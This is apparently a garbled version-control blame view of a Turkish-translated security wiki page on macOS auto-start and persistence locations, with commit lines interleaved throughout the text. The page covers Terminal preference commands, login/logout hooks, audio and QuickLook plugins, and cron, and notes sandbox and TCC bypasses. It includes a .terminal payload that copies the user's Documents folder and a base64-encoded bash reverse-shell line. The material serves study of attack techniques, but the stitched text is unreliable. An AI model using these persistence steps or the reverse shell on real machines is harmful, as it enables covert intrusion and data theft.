 								echo "touch /tmp/hacktricks" >> ~/.zshrc
 								```
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### Yeniden Açılan Uygulamalar
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								{% hint style="danger" %}
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Belirtilen açığı yapılandırmak ve oturumu kapatıp açmak veya hatta yeniden başlatmak, uygulamayı çalıştırmam için işe yaramadı. (Uygulama çalıştırılmıyordu, belki bu eylemler gerçekleştirilirken uygulamanın çalışıyor olması gerekiyor)
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								{% endhint %}
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								**Açıklama**: [https://theevilbit.github.io/beyond/beyond\_0021/](https://theevilbit.github.io/beyond/beyond\_0021/)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Kum havuzunu atlamak için faydalı: [✅](https://emojipedia.org/check-mark-button)
 								* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								* **`~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist`**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* **Tetikleyici**: Uygulamaları yeniden açma işlemi
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								#### Açıklama ve Sömürü
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Yeniden açılacak tüm uygulamalar, `~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist` plist dosyasının içindedir.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Bu nedenle, yeniden açılacak uygulamalar arasına kendi uygulamanızı eklemek için **uygulamanızı listeye eklemeniz yeterlidir**.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								UUID, bu dizini listelerken veya `ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}'` komutu ile bulunabilir.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Yeniden açılacak uygulamaları kontrol etmek için şunu yapabilirsiniz:
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								```bash
 								defaults -currentHost read com.apple.loginwindow TALAppsToRelaunchAtLogin
 								#or
 								plutil -p ~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								**Bu listeye bir uygulama eklemek için** şunları kullanabilirsiniz:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```bash
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								# Adding iTerm2
 								/usr/libexec/PlistBuddy -c "Add :TALAppsToRelaunchAtLogin: dict" \
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								-c "Set :TALAppsToRelaunchAtLogin:$:BackgroundState 2" \
 								-c "Set :TALAppsToRelaunchAtLogin:$:BundleID com.googlecode.iterm2" \
 								-c "Set :TALAppsToRelaunchAtLogin:$:Hide 0" \
 								-c "Set :TALAppsToRelaunchAtLogin:$:Path /Applications/iTerm.app" \
 								~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### Terminal Tercihleri
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* TCC atlatma: [✅](https://emojipedia.org/check-mark-button)
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Terminal, kullanıcının FDA izinlerine sahip olmasını gerektirir.
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
 								* **`~/Library/Preferences/com.apple.Terminal.plist`**
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* **Tetikleyici**: Terminalı Aç
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Açıklama ve Sömürü
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								**`~/Library/Preferences`** içerisinde, Kullanıcı Tercihleri Uygulamalarında saklanır. Bu tercihlerin bazıları, **diğer uygulamalar/skriptleri çalıştırmak** için bir yapılandırma tutabilir.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Örneğin, Terminal Başlangıçta bir komutu çalıştırabilir:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								<figure><img src="../.gitbook/assets/image (676).png" alt="" width="495"><figcaption></figcaption></figure>
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Bu yapılandırma, **`~/Library/Preferences/com.apple.Terminal.plist`** dosyasında şu şekilde yansıtılır:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```bash
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								[...]
 								"Window Settings" => {
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								"Basic" => {
 								"CommandString" => "touch /tmp/terminal_pwn"
 								"Font" => {length = 267, bytes = 0x62706c69 73743030 d4010203 04050607 ... 00000000 000000cf }
 								"FontAntialias" => 1
 								"FontWidthSpacing" => 1.004032258064516
 								"name" => "Basic"
 								"ProfileCurrentVersion" => 2.07
 								"RunCommandAsShell" => 0
 								"type" => "Window Settings"
 								}
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								[...]
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Yani, sistemdeki terminalin tercihlerinin plist'i üzerine yazılırsa, **`open`** işlevi kullanılarak **terminal açılabilir ve o komut çalıştırılabilir**.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Bunu terminalden şu şekilde ekleyebilirsiniz:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
 								{% code overflow="wrap" %}
 								```bash
 								# Add
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" 'touch /tmp/terminal-start-command'" $HOME/Library/Preferences/com.apple.Terminal.plist
 								/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"RunCommandAsShell\" 0" $HOME/Library/Preferences/com.apple.Terminal.plist
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
 								# Remove
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" ''" $HOME/Library/Preferences/com.apple.Terminal.plist
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```
 								{% endcode %}
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								### Terminal Betikleri / Diğer dosya uzantıları
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* TCC atlatma: [✅](https://emojipedia.org/check-mark-button)
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Terminal, kullanıcının FDA izinlerine sahip olmasını gerektirir
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* **Herhangi bir yer**
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* **Tetikleyici**: Terminali Aç
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Açıklama ve Sömürü
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Eğer bir [**`.terminal`** betiği](https://stackoverflow.com/questions/32086004/how-to-use-the-default-terminal-settings-when-opening-a-terminal-file-osx) oluşturursanız ve açarsanız, **Terminal uygulaması** otomatik olarak açılacak ve içinde belirtilen komutları çalıştırmak için çağrılacaktır. Eğer Terminal uygulamasının özel izinleri varsa (örneğin TCC gibi), komutunuz bu özel izinlerle çalıştırılacaktır.
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Denemek için:
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
+								```bash
 								# Prepare the payload
 								cat > /tmp/test.terminal << EOF
 								<?xml version="1.0" encoding="UTF-8"?>
 								<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 								<plist version="1.0">
 								<dict>
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								<key>CommandString</key>
 								<string>mkdir /tmp/Documents; cp -r ~/Documents /tmp/Documents;</string>
 								<key>ProfileCurrentVersion</key>
 								<real>2.0600000000000001</real>
 								<key>RunCommandAsShell</key>
 								<false/>
 								<key>name</key>
 								<string>exploit</string>
 								<key>type</key>
 								<string>Window Settings</string>
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
+								</dict>
 								</plist>
 								EOF
 								# Trigger it
 								open /tmp/test.terminal
 								# Use something like the following for a reverse shell:
 								<string>echo -n "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYxOw==" | base64 -d | bash;</string>
 								```
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### Ses Eklentileri
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Açıklama: [https://theevilbit.github.io/beyond/beyond\_0013/](https://theevilbit.github.io/beyond/beyond\_0013/)\
 								Açıklama: [https://posts.specterops.io/audio-unit-plug-ins-896d3434a882](https://posts.specterops.io/audio-unit-plug-ins-896d3434a882)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* TCC atlatma: [🟠](https://emojipedia.org/large-orange-circle)
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Ek TCC erişimi alabilirsiniz
-												GITBOOK-4226: change request with no subject merged in GitBook

											
										
										
											2023-12-30 00:49:26 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
 								* **`/Library/Audio/Plug-Ins/HAL`**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Root gereklidir
 								* **Tetik**: coreaudiod veya bilgisayar yeniden başlatılmalıdır
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								* **`/Library/Audio/Plug-ins/Components`**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Root gereklidir
 								* **Tetik**: coreaudiod veya bilgisayar yeniden başlatılmalıdır
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								* **`~/Library/Audio/Plug-ins/Components`**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* **Tetik**: coreaudiod veya bilgisayar yeniden başlatılmalıdır
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								* **`/System/Library/Components`**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Root gereklidir
 								* **Tetik**: coreaudiod veya bilgisayar yeniden başlatılmalıdır
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Açıklama
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Önceki açıklamalara göre **bazı ses eklentilerini derleyip** yüklemek mümkündür.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### QuickLook Eklentileri
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Açıklama: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit.github.io/beyond/beyond\_0028/)
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* TCC atlatma: [🟠](https://emojipedia.org/large-orange-circle)
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Ek TCC erişimi alabilirsiniz
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								* `/System/Library/QuickLook`
 								* `/Library/QuickLook`
 								* `~/Library/QuickLook`
 								* `/Applications/AppNameHere/Contents/Library/QuickLook/`
 								* `~/Applications/AppNameHere/Contents/Library/QuickLook/`
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Açıklama ve Sömürü
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								QuickLook eklentileri, bir dosyanın önizlemesini **tetiklediğinizde** (Finder'da dosya seçiliyken boşluk çubuğuna basın) ve **o dosya türünü destekleyen bir eklenti** yüklü olduğunda çalıştırılabilir.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								Kendi QuickLook eklentinizi derleyip, onu yüklemek için önceki konumlardan birine yerleştirebilir ve ardından desteklenen bir dosyaya gidip tetiklemek için boşluk tuşuna basabilirsiniz.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### ~~Giriş/Çıkış Kancaları~~
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								{% hint style="danger" %}
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Bu benim için çalışmadı, ne kullanıcı GirişKancası ne de kök ÇıkışKancası ile.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								{% endhint %}
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								**Açıklama**: [https://theevilbit.github.io/beyond/beyond\_0022/](https://theevilbit.github.io/beyond/beyond\_0022/)
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* `defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh` gibi bir şeyi yürütebilmelisiniz
 								* `~/Library/Preferences/com.apple.loginwindow.plist` içinde bulunur
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								Eskimiş olsalar da, bir kullanıcı oturum açtığında komutları yürütmek için kullanılabilirler.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```bash
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								cat > $HOME/hook.sh << EOF
 								#!/bin/bash
 								echo 'My is: \`id\`' > /tmp/login_id.txt
 								EOF
 								chmod +x $HOME/hook.sh
 								defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh
 								defaults write com.apple.loginwindow LogoutHook /Users/$USER/hook.sh
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Bu ayar `/Users/$USER/Library/Preferences/com.apple.loginwindow.plist` dosyasında saklanır.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```bash
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								defaults read /Users/$USER/Library/Preferences/com.apple.loginwindow.plist
 								{
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								LoginHook = "/Users/username/hook.sh";
 								LogoutHook = "/Users/username/hook.sh";
 								MiniBuddyLaunch = 0;
 								TALLogoutReason = "Shut Down";
 								TALLogoutSavesState = 0;
 								oneTimeSSMigrationComplete = 1;
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								}
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Silmek için:
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								```bash
 								defaults delete com.apple.loginwindow LoginHook
 								defaults delete com.apple.loginwindow LogoutHook
 								```
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Root kullanıcısı **`/private/var/root/Library/Preferences/com.apple.loginwindow.plist`** içinde saklanır.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								## Koşullu Kum Sandığı Atlatma
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
 								{% hint style="success" %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Burada, **kum sandığı atlatma** için yararlı olan başlangıç konumlarını bulabilirsiniz, bu da size basitçe bir şeyi **bir dosyaya yazarak** ve belirli **programlar yüklü, "sıradışı" kullanıcı** eylemleri veya ortamlar gibi belirli **yaygın olmayan koşulların** olmasını beklemek anlamına gelir.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								{% endhint %}
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								### Cron
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								**Açıklama**: [https://theevilbit.github.io/beyond/beyond\_0004/](https://theevilbit.github.io/beyond/beyond\_0004/)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Kum sandığını atlamak için yararlı: [✅](https://emojipedia.org/check-mark-button)
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Ancak, `crontab` ikilisini çalıştırabilmeniz gerekir
 								* Veya root olmanız gerekir
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
 								* **`/usr/lib/cron/tabs/`, `/private/var/at/tabs`, `/private/var/at/jobs`, `/etc/periodic/`**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Doğrudan yazma erişimi için root gereklidir. `crontab <dosya>`yı çalıştırabilirseniz root gerekli değildir
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* **Tetikleyici**: Cron işine bağlıdır
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Açıklama ve Sömürü
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								**Mevcut kullanıcının** cron işlerini listelemek için:
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								```bash
 								crontab -l
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								MacOS'ta, **`/usr/lib/cron/tabs/`** ve **`/var/at/tabs/`** (root gerektirir) dizinlerinde kullanıcıların tüm cron işlerini görebilirsiniz.
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								MacOS'ta, belirli bir sıklıkla betikleri çalıştıran birkaç klasör bulunabilir:
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								```bash
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								# The one with the cron jobs is /usr/lib/cron/tabs/
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Burada düzenli **cron işleri**, **at işleri** (pek kullanılmaz) ve **periyodik işler** (genellikle geçici dosyaları temizlemek için kullanılır) bulabilirsiniz. Günlük periyodik işler örneğin şu şekilde çalıştırılabilir: `periodic daily`.
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								**Kullanıcı cron işi programatik olarak eklemek** için şu kullanılabilir:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```bash
